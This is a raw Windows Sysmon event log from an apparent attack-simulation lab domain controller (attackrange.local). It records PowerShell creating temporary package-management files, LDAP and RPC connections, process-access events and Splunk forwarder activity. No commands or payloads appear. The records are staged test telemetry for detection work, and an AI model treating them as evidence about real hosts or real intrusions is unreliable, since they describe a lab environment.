21:07:57.804{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\mt3qkl4i.j2bMD5=C9407671041EAF874E42FEEA83E9E055,SHA256=5623F3990AC72788F17C5D57127B8E99F31369D39030A38E203367E2B6041ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.772{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\djw4inso.35sMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.757{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\rcmof2wj.oalMD5=D35B8C04DA801DE749B12D5DA8A0B9A0,SHA256=9CB8C56FA40380069256C24AB816BFD0E08201E16B654BD76D0EC0608DC1CCE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.172{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61478-false10.0.1.12-8000- 10341000x800000000000000024142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.179{4DB9351A-A2AC-60D3-1B06-00000000CF01}68366700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.976{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9A52D22A015972FA87B90E05AA4289,SHA256=09FE67633AA97259EB579510990965199797178430CF6EEEA4046A6A03DF5FFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.944{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5f0xah43.l13.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.929{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mze03wpy.g4m.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000024183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.929{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mze03wpy.g4m.ps12021-06-23 21:07:58.929 10341000x800000000000000024182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:58.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:58.382{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\1w2cbuqc.r55MD5=628DA2D060916BBA4E8623EB3E53CDC8,SHA256=DE2EBFE08D13AB88EFC596DCC2AA39982EBC61366A6A222789FADF8F902EFC4A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 11241100x800000000000000024178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:07:58.272{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Program Files\PackageManagement\ProviderAssemblies\nuget\2.8.5.208\Microsoft.PackageManagement.NuGetProvider.dll2021-06-23 21:07:58.272 354300x800000000000000024177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.061{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61481-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.061{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61481-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.053{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61480-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.053{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61480-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.032{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61479-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000024172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.032{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61479-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 23542300x800000000000000024171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.241{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\qkiwfrci.r5jMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.179{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\s0l3jztm.24rMD5=D35B8C04DA801DE749B12D5DA8A0B9A0,SHA256=9CB8C56FA40380069256C24AB816BFD0E08201E16B654BD76D0EC0608DC1CCE1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:58.132{4DB9351A-A2AD-60D3-1C06-00000000CF01}47285748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.085{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17449126F85C19E92570E2E397861D9A,SHA256=6287E92E5508C33770727CE2F3C8B3C5BB0FA932C55C5F1300A1FE6846575567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.085{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1538B4ADF44DFFFCFCF6D324750A3F7E,SHA256=41FB7A1D5EDC7972CF5086F1494AE08D52FCFBE4C3ADE00E54E64903D449A10D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:58.069{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\cz3fl0ce.aiwMD5=14AD3E020B9E8121460254AEC3AAEA2F,SHA256=24A76615A9B93AFF49269A1EDFBBCD45FD41A60326433524BB614DEE1183CF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.038{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\gzyela5p.mqcMD5=0B389CA2DA08BF7B217828D2A4A828DE,SHA256=60D0B41C1EF939DB71B70D07E65DFB09B0379B2939420A63FAEA07C810D33015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.022{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\fuze3mjn.fstMD5=58DF22AFF6DA746F449C60D566891608,SHA256=263210FC8DC380AF590E8056B97D16F8C3543F282D09FE08E34A141E60B1A02E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.007{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\tfgsdjgd.upsMD5=A3479274A236C3BB0348E595DBCC76CD,SHA256=4FC03FD60CABACEF9E895F40A0C20034BA073B82223953FAC14FB2FA9BF2D8D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:59.958{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.586{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.491{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=65D35A478E443AEAED23D45B6CB74C80,SHA256=6EDA1956531DF564388BFF403844C70999254BA555A1B121F38A1E1BCB7197DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.821{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A69C452E175B23281C3B0CBC59D8D9C3,SHA256=5201F7F23ABDA13AE66557A78EC1882ED71C62F699C54C565EFA4D8FEA3F3231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.598{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A5038936FA9AB86A0B5826C5571C809,SHA256=6615B4445D97BB78E200E2EAF031F00E7F01B2D973C61D35E7164EB4BD33F6FD,IMPHASH=00000000000000000000000000000000falsetrue 
